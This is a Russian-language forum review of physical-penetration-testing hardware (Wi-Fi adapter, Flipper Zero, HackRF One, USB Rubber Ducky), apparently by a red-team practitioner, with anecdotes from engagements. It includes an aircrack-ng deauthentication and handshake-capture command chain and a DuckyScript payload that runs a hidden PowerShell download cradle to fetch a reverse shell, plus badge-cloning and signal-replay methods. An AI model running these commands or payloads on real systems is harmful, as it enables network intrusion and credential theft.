РАЗБОР На проверке

Железо для хакера: обзор реальных устройств

Сергей Попов
Сергей Попов Red Team · 6,5 тыс. сообщений
Подписаться
104
[ обложка статьи ]
Режим чтения
Макросъёмка хакерских устройств на антистатическом коврике: Flipper Zero с экраном клонирования RFID, Wi-Fi-адаптер с двумя антеннами, платы HackRF One и USB Rubber Ducky с янтарной подсветкой в ре...


Physical assessment для логистической компании. Клиент спокоен: СКУД на NFC-картах, корпоративный Wi-Fi с WPA2-Enterprise, USB-устройства заблокированы через GPO. За один рабочий день четыре устройства общей стоимостью меньше $700 закрыли четыре вектора начального доступа. Alfa AWUS036ACH подняла Evil Twin в переговорной - два сотрудника ввели доменные пароли в фейковый портал. Flipper Zero клонировал RFID-бейдж 125 kHz у курьера на входе. HackRF One перехватил сигнал ворот паркинга на 433 МГц с OOK-модуляцией. USB Rubber Ducky отработал reverse shell на незалоченном терминале ресепшена (без активного AMSI/Defender) за 4 секунды. Ни одна система защиты не среагировала. Ни на одно из действий.

Этот набор - не витрина гаджетов для красивых фоток в Instagram. Это инструментарий, которым закрывается 80% задач physical pentest.

Почему в обзоре именно эти четыре категории​

На рынке десятки устройств для пентеста: WiFi Pineapple, Proxmark3, Bash Bunny, O.MG Cable, LAN Turtle, ESP32-платы, Ubertooth One. Четыре категории выбраны по покрытию основных векторов физического тестирования по MITRE ATT&CK - каждое устройство закрывает свою группу техник в цепочке от начального доступа до эксфильтрации.

Вектор атакиТехника MITRE ATT&CKУстройство
Wi-Fi: rogue AP, перехват трафикаEvil Twin (T1557.004), Network Sniffing (T1040), Wi-Fi Discovery (T1016.002)Wi-Fi адаптер с monitor mode
Физический доступ: RFID/NFC/Sub-GHzHardware Additions (T1200, Initial Access)Flipper Zero
Радиочастотный анализ проприетарных протоколовNetwork Sniffing (T1040, по аналогии - ATT&CK не имеет отдельной техники для RF-сниффинга вне сетевых протоколов)HackRF One
Доставка payload через USBHardware Additions (T1200, Initial Access), Command and Scripting Interpreter: PowerShell (T1059.001, Execution - Windows)USB Rubber Ducky

Четыре категории вместе - минимальный набор для полноценного physical assessment. Бизнес-логика простая: злоумышленник, получивший физический доступ к сети через любой из этих векторов, дальше переходит к lateral movement и эксфильтрации. Задача пентестера - показать заказчику этот путь до того, как его пройдёт реальный атакующий.

Что не вошло в обзор и почему:

WiFi Pineapple Mark VII - специализированный rogue AP от Hak5 с тремя радиомодулями и веб-интерфейсом для автоматизации Wi-Fi-кампаний. Штука удобная, но связка Alfa-адаптера с hostapd покрывает те же сценарии при стоимости в 3-4 раза ниже. Pineapple выигрывает по удобству автоматизации, а для понимания механики атаки Alfa полезнее.

Proxmark3 RDV4/5 - gold standard для RFID-исследований. Криптоанализ MIFARE DESFire, relay-атаки, снифф коммуникаций между картой и ридером. По данным Lab401, Proxmark 5 на 65% быстрее предшественника и поддерживает беспроводной модуль. Но для 80% задач physical assessment - клонирование EM4100, HID Prox, чтение MIFARE Classic - Flipper Zero достаточен. Proxmark - следующая ступень.

Ubertooth One - единственный инструмент для полноценного Bluetooth-аудита (BLE sniffing, перехват на уровне link layer). Bluetooth-вектор и техника Exfiltration Over Bluetooth (T1011.001) - тема для отдельной статьи.

Bash Bunny / O.MG Cable - развитие концепции Rubber Ducky. Рассмотрены как аналоги в разделе о keystroke injection.

Wi-Fi адаптер для Kali Linux: от чипсета до handshake​

Встроенная Wi-Fi карта ноутбука для пентеста не годится в 95% случаев. Нужен внешний адаптер с поддержкой monitor mode (пассивный захват фреймов) и packet injection (отправка произвольных фреймов). Без этих двух режимов ни деаутентификация клиентов, ни захват WPA handshake, ни разворачивание Evil Twin - ничего из этого не взлетит.

Какой чипсет выбрать для monitor mode​

В Wi-Fi адаптере для взлома решает не бренд и не длина антенны - решает чипсет. От него зависит совместимость с драйверами Kali Linux и стабильность в нужных режимах.

ЧипсетДиапазоныMonitor modePacket injectionДрайвер в KaliМодель-примерОграничения
RTL8812AU2.4 + 5 GHzДаДаrtl8812au (DKMS)Alfa AWUS036ACHТребует сборки драйвера; нагрев при длительной работе
AR92712.4 GHzДаДаath9k_htl (в ядре)Alfa AWUS036NHAТолько 2.4 GHz - не видит 5 GHz сети
RTL8811AU2.4 + 5 GHzДаДаrtl8812auAlfa AWUS036ACSОдна антенна, ниже мощность TX
MT7612U2.4 + 5 GHzДаЧастичноmt76 (в ядре)Netgear A6210Injection нестабилен на некоторых ядрах

Alfa AWUS036ACH - адаптер, который беру на каждый проект. Двухдиапазонный, две съёмные антенны RP-SMA (можно заменить на направленные 9 dBi для увеличения дальности), чипсет RTL8812AU с полной поддержкой monitor mode и injection в обоих диапазонах. Единственная боль - драйвер не в ядре, нужна установка через DKMS, и после обновления ядра Kali иногда приходится пересобирать. Классика жанра.

Alfa AWUS036NHA - бюджетный вариант на AR9271 за $25-35. Работает только в 2.4 GHz, зато драйвер ath9k_htl уже в ядре - подключил и работаешь. Для первого адаптера - оптимальный выбор.

Когда адаптер не поможет: WPA2/3-Enterprise с EAP-TLS (аутентификация по сертификатам) - перехват handshake бесполезен. Тут нужен rogue RADIUS или social engineering для получения сертификата.

Захват handshake на практике​

Базовая цепочка для адаптера мониторинга Wi-Fi в Kali Linux:
Bash:
# Убиваем процессы, блокирующие интерфейс
sudo airmon-ng check kill
# Переводим адаптер в monitor mode
sudo airmon-ng start wlan0
# Сканируем эфир - все AP и клиенты
sudo airodump-ng wlan0mon
# Фиксируем handshake конкретной сети
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
Параллельно в другом терминале: sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon - деаутентификация конкретного клиента (-c) для провокации повторного подключения и захвата handshake. Без -c отправляется broadcast deauth - менее надёжно, и не сработает при включённом PMF (802.11w). Файл capture-01.cap уходит в hashcat -m 22000 для офлайн-перебора.

Момент, который часто упускают: деаутентификация - это denial of service, и она не работает против клиентов с включённым PMF (802.11w). Для современных WPA2-Enterprise это типичная настройка, а в WPA3 - обязательная. В таких случаях нужен downgrade attack или ожидание естественного reconnect. На одном engagement заказчик запретил deauth в рабочие часы. Пришлось ждать до 19:00 и работать с теми клиентами, которые подключались к Wi-Fi после окончания рабочего дня. Всегда уточняйте допустимость DoS-воздействия в scope - иначе можно нечаянно положить продакшен.

Flipper Zero: возможности и пределы мультитула

Flipper Zero - самое обсуждаемое железо для хакера за последние два года. Его показывают на конференциях, демонстрируют на YouTube, запрещают на Amazon. За хайпом скрывается реально полезный инструмент для physical assessment, но с чётким набором ограничений, о которых маркетинг предпочитает молчать.

Sub-GHz, RFID, NFC, BadUSB - что внутри​

По данным flipper.net, в корпусе размером 100×40×25 мм и весом 102 грамма собран целый зоопарк:
  • Sub-1 GHz трансивер на чипе CC1101 - передача и приём в полосах 315/433/868/915 МГц. Модуляции OOK, ASK, 2-FSK, 4-FSK, GFSK, MSK. Дальность до 50 метров. Покрывает шлагбаумы, ворота, IoT-сенсоры, брелки со статическим кодом.
  • 125 kHz RFID - чтение, запись, эмуляция карт EM4100, HID Prox, Indala, FDX, Viking, PAC Stanley, Gallagher, Jablotron и других. Антенна на нижней панели.
  • NFC 13.56 MHz - MIFARE Classic, Ultralight, DESFire, FeliCa, HID iClass (PicoPass). Чтение UID, дамп секторов, эмуляция.
  • BadUSB - эмуляция клавиатуры с поддержкой DuckyScript. По сути превращает Flipper Zero в USB Rubber Ducky.
  • IR-передатчик/приёмник - встроенная библиотека для TV, кондиционеров, проекторов. Захват и воспроизведение ИК-команд.
  • GPIO - 13 пинов, UART/SPI/I2C конвертер для аппаратного анализа.
  • BLE 5.4 - связь с мобильным приложением, удалённое управление.
Батарея 2100 mAh - до 28 дней в standby.

Три реальных сценария на physical assessment​

Клонирование RFID-бейджа. Подхожу к входной группе, прошу курьера «приложить карту к считывателю» - Flipper Zero в кармане куртки фиксирует EM4100 за секунду. Эмулирую на устройстве - прохожу через СКУД. Работает только с картами 125 kHz без криптозащиты. С MIFARE DESFire уже нужен Proxmark3 с ключами шифрования - тут Flipper бессилен.

Sub-GHz replay. Записываю сигнал открытия ворот паркинга на 433 МГц. Если код статический (фиксированная последовательность) - воспроизвожу и прохожу. Если rolling code (автомобильные брелки, часть современных шлагбаумов) - стоковый Flipper Zero replay не выполнит. Точка.

BadUSB payload. Подключаю Flipper Zero по USB к незалоченному терминалу - DuckyScript запускает PowerShell reverse shell за 3-4 секунды. По MITRE ATT&CK - Hardware Additions (T1200, Initial Access).

Ключевое ограничение, которое стоит зарубить на носу: Flipper Zero - мультитул, не специализированный инструмент. В Sub-GHz уступает HackRF One по диапазону и аналитике. В RFID уступает Proxmark3 по криптоанализу. В BadUSB уступает Rubber Ducky по зрелости payload'ов. Но для быстрой разведки и PoC на физическом пентесте - ничего компактнее пока нет.

Характерный пример: в 2023 году исследователь обнаружил, что Flipper Zero может вызывать краш iPhone через BLE-спам pairing-запросами. Уязвимость затрагивала iOS 17 - Apple позже закрыла вектор. Мультитул за $170 роняет флагманский смартфон - неплохо для «игрушки», правда?

HackRF One: когда Flipper Zero недостаточно​

HackRF One - SDR-устройство с диапазоном от 1 МГц до 6 ГГц и полосой до 20 МГц. Если Flipper Zero - швейцарский нож, то HackRF - профессиональный спектроанализатор и трансмиттер в одном корпусе.

SDR-устройство vs мультитул: когда нужен именно HackRF​

ПараметрFlipper ZeroHackRF One
Диапазон315/433/868/915 МГц (фиксированные полосы)1 МГц - 6 ГГц (непрерывно)
Ширина полосыУзкая (CC1101)До 20 МГц
ПередачаДа (маломощная)Да (half-duplex, до 15 dBm)
Анализ спектраНетДа (GNU Radio, gqrx)
АвтономностьБатарея, экран, кнопкиНужен ноутбук
Цена~$170~$300-350
Кривая обученияНизкаяВысокая (и это мягко сказано)

Когда HackRF необходим:

Проприетарные беспроводные протоколы - LoRa-датчики, промышленные SCADA-системы, охранные сигнализации на нестандартных частотах. Flipper Zero ограничен предустановленными модуляциями CC1101, а HackRF принимает любой сигнал в диапазоне. Разница как между рацией и полноценным приёмником.

Визуализация спектра - через gqrx или GNU Radio Companion видно все передачи в полосе. На одном проекте именно waterfall-диаграмма в gqrx показала, что охранная система клиента на 868 МГц использует простую OOK-модуляцию без шифрования. Flipper Zero на этой частоте тоже работает, но без визуализации понять модуляцию было бы значительно сложнее.

GSM/LTE-тестирование - развёртывание тестовых базовых станций через srsRAN (требует отдельной лицензии на передачу).

Критическое ограничение: HackRF One - half-duplex. Одновременно принимать и передавать нельзя. Для relay-атак в реальном времени нужны два устройства. 8-битный АЦП даёт динамический диапазон хуже, чем у профессиональных SDR (USRP, BladeRF с 12-бит АЦП). Для задач с высокой чувствительностью приёмника HackRF не оптимален - но за $300 ничего лучше не найти.

Основной софт - GNU Radio Companion для построения обработчиков сигналов и gqrx для быстрого осмотра эфира. Кривая обучения GNU Radio - самая крутая из всех устройств в этом обзоре. Требуется понимание цифровой обработки сигналов, модуляций и протоколов. Это не «нажал кнопку - получил результат». Скорее «прочитал три книги, собрал flowgraph, отладил час, получил результат».

USB Rubber Ducky и аналоги BadUSB​

USB Rubber Ducky от Hak5 выглядит как обычная флешка, но компьютер распознаёт его как клавиатуру (HID-устройство). Внутри - процессор и слот microSD для payload-скрипта. ОС доверяет HID-устройствам по умолчанию: никаких запросов на установку драйверов, никаких подтверждений. Воткнул - и оно уже «печатает».

DuckyScript payload на практике​

DuckyScript - скриптовый язык для описания последовательности нажатий:
Код:
DELAY 2000
GUI r
DELAY 500
STRING powershell -w hidden -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/sh.ps1')"
ENTER
REM NB: На Windows 10/11 с включённым Defender/AMSI этот one-liner будет заблокирован - требуется обфускация или AMSI bypass
Payload ждёт 2 секунды, открывает «Выполнить» (Win+R), вбивает команду PowerShell для загрузки reverse shell. Весь процесс - 3-4 секунды на системах без активного AMSI/Defender. На современных Windows 10/11 с дефолтным Defender этот паттерн будет заблокирован и потребует обфускации payload. По MITRE ATT&CK: Hardware Additions (T1200) для доставки и Command and Scripting Interpreter: PowerShell (T1059.001, Execution, только Windows) для запуска.

На реальном engagement самый рискованный момент - физический доступ к USB-порту. Если терминал не залочен и GPO не блокирует HID-устройства - payload отрабатывает штатно. Современные версии Rubber Ducky поддерживают fingerprinting ОС (определяют Windows/Mac/Linux перед запуском) и имитацию человеческой скорости набора для обхода endpoint-решений, отслеживающих аномально быстрый ввод. Хитрая штука - печатает как секретарша, а не как робот.

Аналоги: от DigiSpark до O.MG Cable​

УстройствоЦенаМаскировкаКлючевая особенностьКогда НЕ подходит
USB Rubber Ducky (Hak5)~$80USB-флешкаDuckyScript, fingerprinting ОС, зрелая среда payload'овGPO блокирует USB HID
Flipper Zero (BadUSB)~$170Открытое устройствоDuckyScript-совместим плюс все остальные функцииНужна скрытность подключения
Bash Bunny (Hak5)~$100USB-флешкаDuckyScript + сетевые атаки (Ethernet over USB)Нужен только keystroke injection
O.MG Cable~$180Lightning/USB-C/micro-USB кабельПолностью скрыт, Wi-Fi управление удалённоБюджетные ограничения
DigiSpark (ATtiny85)~$3-5Миниатюрная платаДёшево, программируется в Arduino IDEНет DuckyScript, нужна кастомная прошивка
Malduino~$40USB-флешкаOpen-source, Arduino-совместимМенее зрелая среда

O.MG Cable - отдельная категория скрытности. По данным Lab401, это кабель зарядки с имплантом внутри, управляемый по Wi-Fi. Жертва видит обычный Lightning или USB-C кабель, а оператор выполняет keystroke injection удалённо. На physical assessment - самый скрытный вариант BadUSB-атаки из доступных. Выглядит как зарядка от iPhone. Работает как reverse shell.

Сводная таблица: железо для хакера под задачу​

КритерийAlfa AWUS036ACHFlipper ZeroHackRF OneUSB Rubber Ducky
Цена~$50-70~$170$300-350~$80
Основная задачаWi-Fi аудит, Evil TwinPhysical access мультитулSDR анализ радиочастотKeystroke injection
АвтономностьНужен ноутбукПолная (батарея + экран)Нужен ноутбукПолная
Кривая обученияСредняяНизкаяВысокаяНизкая
СкрытностьНизкая (антенны торчат)СредняяНизкая (размер + кабели)Высокая
MITRE ATT&CKT1557.004, T1040, T1016.002T1200, T1059.001T1040T1200, T1059.001
Когда НЕ подходитWPA2/3-Enterprise EAP-TLSMIFARE DESFire, rolling code, широкополосный RFFull-duplex, автономная работа в полеЗалоченные терминалы, GPO на USB HID

Что брать первым при ограниченном бюджете: Alfa AWUS036NHA ($25-35) и USB Rubber Ducky ($80) - суммарно ~$110 за Wi-Fi и HID-вектора. Следующий шаг - Flipper Zero как универсальный инструмент для physical assessment. HackRF One - для целенаправленной работы с RF и при готовности вкладывать время в GNU Radio.

Где покупать и правовые рамки​

📚 Часть контента скрыта. Этот материал доступен участникам сообщества с рангом One Level или выше
Получить доступ просто — достаточно зарегистрироваться и проявить активность на форуме

За три года работы с этим набором я пришёл к выводу, который расходится с тем, что пишут в обзорах: 90% результата на physical assessment дают не характеристики устройств, а два других фактора - подготовка сценария и умение разговаривать с людьми. Flipper Zero за $170 бесполезен без предварительной разведки типа СКУД у клиента. HackRF за $350 - дорогой спектроанализатор, если не знаешь, что именно искать в эфире. DigiSpark за $3 с правильным payload и грамотным pretexting доставит reverse shell не хуже Rubber Ducky за $80.

Индустрия движется к конвергенции: Flipper Zero уже вобрал функции пяти отдельных устройств, аксессуары вроде AWOK Dual C5 Touch добавляют ему двухдиапазонный Wi-Fi 6 и BLE wardriving. Через пару лет один гаджет будет покрывать Wi-Fi, BLE, Sub-GHz, NFC, HID и SDR одновременно - зачатки видны уже сейчас. Но пока этого не произошло, набор из четырёх категорий остаётся минимальным и достаточным. Главная ошибка новичков - покупать железо до того, как научились его применять. Если хочется отработать цепочку от physical access до reverse shell на живом стенде - на HackerLab есть сценарии с этой связкой, где EDR в дефолте не мешает разобраться в механике.
Полезно

Комментарии

0